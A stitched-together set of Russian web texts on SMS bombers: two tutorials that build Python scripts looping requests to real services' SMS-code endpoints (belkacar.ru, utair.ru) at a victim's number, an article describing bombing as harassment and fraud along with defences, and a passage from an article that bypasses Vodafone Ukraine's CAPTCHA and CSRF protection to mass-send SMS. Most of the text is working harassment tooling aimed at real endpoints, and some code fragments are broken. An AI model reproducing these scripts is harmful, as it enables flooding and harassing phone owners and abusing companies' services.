Пишем бомбер на Python + немного изучаем библиотеку requests.
$RUSSIAN_HACKER$
Лично я считаю, что бомбер — это лажа. Но почему-то многие просят запустить его на кого-то. Поэтому сегодня мы немножко разберем библиотеку requests и напишем мощный смс-бомбер на python.
Начнем.
Для начала установим саму библиотеку.
pip install requests

Поскольку у меня он уже установлен, у меня написано «requirement already satisfied». Но у вас будет по-другому.
Далее импортируем нашу свежеиспеченную библиотеку в скрипт.
import requests

Отлично, теперь давайте проверим разные сайты на их подключение. Пишем.
check = requets.get(«https://github.com/»)
print(check)

И запустим наш код.

Если у вас также, то это значит, что сайт github.com работает!
В двух словах, метод get создает подключение к серверу ( в нашем случае к сайту github ). Бомберы работают похожим образом, они создают запрос на отправку сообщения на номер, указанным пользователем. Далее нам откроются такие параметры, как data, header и json. Про json вы можете почитать сами, также как и про header, а вот про data я сейчас немного поясню. Data — это ввод в понял страницы. Например там где указанно поле phone, то мы туда, с помощью параметра data запишем номер обидчика. Как вы уже поняли, писать бомберы очень легко, основная задача состоит в том, чтобы найти серверы, которые предоставляют отправку смс на номер.
Давайте создадим мини бомбер. Для этого пишем.
phone = input(«Введите номер обидчика +»)
requests.post(‘https://belkacar.ru/get-confirmation-code’,data=)

Ура. Мы создали свой первый бомбер, который спамит 1 сообщение! Чтобы сделать больше, нужно искать подходящие сервера и писать что-то подобное. Или можно рискнуть и поставить while True:, чтобы приходило много сообщений от 1 провайдера. Почему риск? Могут заблокировать по ip :/. Если мы запустим наш код, мы увидим следующее:

Это значит, что запрос был совершен и программа завершилась.
Ну вот и все, мы создали наш собственный бомбер.
Всех люблю, пока.
СМС-бомберы: спам как элемент кибератаки

Количество мошенничеств с использованием мобильных телефонов пользователей растет. Издание «Коммерсантъ» отмечает увеличение злонамеренных вызовов в мае на 30% по сравнению с аналогичным периодом в прошлом году. Также, «Вымпелком» сообщил о том, что число случаев телефонных мошенничеств с начала марта сильно возросло. Этому способствуют множественные утечки данных пользователей разных сервисов. В руки злоумышленников попадают базы номеров клиентов аптек, служб доставок и других сервисов. Один из относительно новых способов интернет-мошенничества – это СМС-бомберы.
SMS-бомберы
СМС-бомберы – это ПО, которое позволяет проводить массовые рассылки сообщений на заданный номер мобильного телефона. Бомбинг может быть использован в разных целях, как для агрессивного маркетинга, так и для спам-атаки с помощью СМС. На платформе GitHub по целевому запросу можно найти более 700 предложений с разными рейтингами и количеством скачиваний. Вот топ программ на разных языках: 1. Python. TheSpeedX/TBomb. 2. Java. jdleo/SMS-BOMBER. 3. PHP. KyxRecon/SMS-BOMBER.PHP. Для людей, которые совершенно не знакомы с кодом и не умеют им пользоваться, есть уже готовые решения: от профильных сайтов до телеграм-каналов.
Почему СМС-бомбинг популярен
- Минимум затрат. Как правило, владельцы бомбинг-сервисов просят за свои услуги незначительную сумму и берут количеством клиентов, либо зарабатывают с показов рекламы.
- Условная безопасность. СМС-бомбинг в чистом виде трудно квалифицировать как правонарушение. Для физических лиц самым серьезным наказанием может быть административный штраф, и то в случае если жертва обратится в правоохранительные органы, а злоумышленник будет установлен.
- Простота. Причем как создания бомбера, так и его использования клиентами. Достаточно зарегистрироваться в сервисе, выбрать продолжительность и другие характеристики бомбинга, и ввести номер жертвы.
Формальным «недостатком» СМС-бомбинга можно назвать низкое КПД – защититься от него можно примитивной блокировкой, одним нажатием в меню настроек смартфона.
Для чего используется SMS-бомберы
Бомбинг СМС-сообщениями может быть использован для разных целей. Чаще всего это:
- Реклама. Например, в рамках запуска нового интернет-магазина приобретается база данных клиента магазина со схожей тематикой, и сообщения рассылаются на «теплую аудиторию».
- Кибератака. В таком случае бомбинг проводится с целью получить данные пользователя. Это могут быть вредоносные ссылки или сообщения о попытке войти в личный кабинет на определенном ресурсе.
- Буллинг. Например, один из соседей постоянно проводит шумный ремонт в неурочное время, и активисты соседского чата решают ему отомстить с помощью ночного бомбинга СМС-сообщениями.
Можно говорить о том, что SMS-бомбинг применяется широко: от безобидных розыгрышей до намеренной травли или мошеннических целей.
СМС-бомбинг и бренды
Отдельный интерес вызывает использование форм восстановления паролей разных компаний для осуществления СМС-бомбинга. Скрипт отправляет запрос на восстановление пароля для номера жертвы. В ответ на телефон приходит СМС-код. Если на сайте компании не установлен таймер – скрипт может провести десятки запросов за одну минуту. Например, множество пользователей сервиса Аптека.ру столкнулись с похожей проблемой.
Такая спам-атака «нагружает» и смартфон пользователя, и сайт компании. Впрочем, на данный момент большинство организаций знают об этой проблеме и устанавливают лимиты отправки СМС-кодов, чтобы предотвратить нелегитимное использование веб-ресурса в качестве инструмента спам-атаки.
Как узнать кто запустил СМС-бомбер
Это зависит от уровня квалификации злоумышленника. Если говорить о человеке, который соблюдает цифровую анонимность и не пользуется готовыми SMS-bombing платформами, то вычислить его практически невозможно.
Если же речь идет о тех случаях, когда бомбинг используют непрофессионалы, то самое уязвимое место – это SMS-центры, которые используем бомбер. Они работают официально и запрашивают регистрационные данные у своих пользователей. Закон обязывает такие сервисы предоставлять данные по запросу правоохранительных органов. В некоторых случаях, можно обойтись и мотивированным адвокатским запросом.
Однако, ситуация может быть затруднена в том случае, если человек использовал подставные номера. Тогда определение злоумышленника потребует бОльших ресурсов и технических средств.
Способы защиты от СМС-бомбинга
Самый простой способ защититься от агрессивного SMS-спама – это краткосрочное отключение устройства. Большинство бомбинг-сервисов предоставляют услуги по бомбингу в течение 20 минут. Отключение устройства на 10-15 минут позволит прервать алгоритм работы скрипта.
Другой способ, более надежный и рассчитанный на постоянную защиту – это использование сервисом блокировки от СМС-бомбинга. Они могут предоставляться как провайдерами связи, так и сторонними приложениями.
Гайд SMS B0MBER — PYTHON
Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нём некорректно.
Вам необходимо обновить браузер или попробовать использовать другой.
|| NN — NoName ||
Известный
Автор темы
Я знаю, что тем по написанию SMS BOMB`еров было дохуя, но я решил написать, это самый простой смс бомбер, он работает и на андроиде и на пк.
- Импортировать библиотеки.
- Узнать номер телефона.
- Сделать проверку номера телефона.
- Сделать запрос.
1. Импортируем библиотеки:
import requests # Загружаем библиотеку requests import time # Загружаем библиотеку time
2) Узнаём номер телефона:
print("Привет, это урок по написанию SMS BOMBER\n\nНомер телефона, должен начинатся так: +7 или +380\n\n") #Выводим в консоль текст. phone = input("Номер: ") #Номер мобильного телефона на который хотите направить спам.
3)Делаем проверку номера телефона:
if (phone[0:2] == "+7" and len(phone[1:]) == 11) or (phone[0:4] == "+380" and len(phone[1:]) == 12): #Делаем проверку, сколько цифр и правильно ли в начале. #Сюда пункт 4 else: print("Номер телефона набран не правильно, повторите попытку")
4) Делаем запрос в бесконечном цикле.
while True: # Делаем бескоенчный цикл. cl = requests.session() cl.get('https://b.utair.ru/api/v1/login/') rSL = requests.post('https://b.utair.ru/api/v1/login/', headers = , json=) # Отпраялем запрос. if rSL.status_code == 200: # Делаем проверку на результат. print("Сообщение от сервиса utAir отправлено.") # Если результат выполнен else: # Если проверка не пройдена print("Сообщение от сервиса utAir не отправлено.") time.sleep(5) # Задержка
Пункт №4, добавляем между if и else.
Дальше может быть расскажу где и как доставать ссылки(чтобы смс приходило), как сделать бомбер для Telegram, и т.д.
Напишите если надо.
Сам бомбер оставлю во вложениях.
SMS-бомбер на Python. Трюк от читателя: эксплуатируем недоработки Vodafone (бывший «МТС Украина»)

В этой статье мы исследуем ошибки реализации CAPTCHA и CSRF-токенов, в результате чего научимся рассылать SMS в любом количестве через гейт Vodafone.
![]()
WARNING
Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи.
Обзор онлайн SMS-сервиса Vodafone
Наш сегодняшний подопытный, портал http://mts.ua , раньше принадлежал «МТС Украина». Эту контору выкупил Vodafone. Есть на этом сайте и форма отправки SMS.
Защищена она цифровой CAPTCHA из четырех символов. Стоит отметить, что форма позволяет отправлять SMS только клиентам Vodafone с префиксами номеров:
+38050 +38066 +38095 +38099
Теперь посмотрим на саму CAPTCHA. Как видишь, цифры вполне различимы. Они имеют красный цвет, но их верх обрезан, и расположены они очень близко друг к другу.
А теперь приглядимся более внимательно к той части скрипта, которая отображает CAPTCHA. Если мы сформируем ссылку
http://www.mts.ua/?r=site/captcha&v=5981aff096f17&widgetId=messager&width=115&height=42&backColor=0xffffff&foreColor=0xff0000
то увидим CAPTCHA с высотой 42 пикселя и 115 пикселей шириной. Изменив значения на 242 и 315, мы получим удивительный результат: обрезанный верх цифр уйдет и расстояние между символами увеличится.
При отправке SMS скрипту http://www.mts.ua/ru/online-services/send-sms/ через метод POST передаются следующие параметры:
- YII_CSRF_TOKEN — это CSRF-токен, который нужно прочитать из HTML один раз при подготовке рассылки;
- widgetId:’messager’ — это стандартное значение, оно не меняется;
- MessageForm[network]:’38050′ — из значения ясно, что это мобильная сеть;
- MessageForm[phone]:’123-45-67′ — номер телефона, куда отправляем SMS;
- MessageForm[encoding]:’cyrilic’ — кодировка сообщения, можно менять;
- MessageForm[is_translit]:’0′ — транслитерация (0 — выключена, 1 — включена);
- MessageForm[message]:’Привет 123′ — сам текст сообщения;
- MessageForm[verifyCode]:’4444′ — распознанная CAPTCHA.
Также не стоит забывать, что нужно хранить cookies! В дальнейшем мы к этому вернемся.
Разработка SMS-бомбера
Попробуем разработать SMS-бомбер — скрипт, который будет рассылать через гейт множество однотипных SMS-сообщений. Разрабатывать будем на Python 2.x, также нам понадобятся модули requests, pytesseract, Image.
Скрипт мы будем разрабатывать под Windows, с чем и связаны особенности установки Tesseract и настройки путей.
![]()
WWW
- FAQ по Tesseract для Python
- FAQ по requests для Python
В самом начале мы получаем CSRF-токен:
def get_csrf(): xhtml=get_url("http://www.mts.ua/ru/online-services/send-sms/",1) xs=xhtml.find("var csrfToken = '") xl=len("var csrfToken = '") csrf_=xhtml[xs+xl:xs+xl+40] return csrf_
Функция очевидная — обычный поиск текста. CSRF-токен получаем всего один раз за всю рассылку.
Теперь нужно получить CAPTCHA и распознать ее. Для этого мы будем использовать Tesseract. Вначале нужно установить саму программу и модуль Python к ней. Полный исходный код функции можно посмотреть в скрипте, который я приведу в конце статьи.
Присоединяйся к сообществу «Xakep.ru»!
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
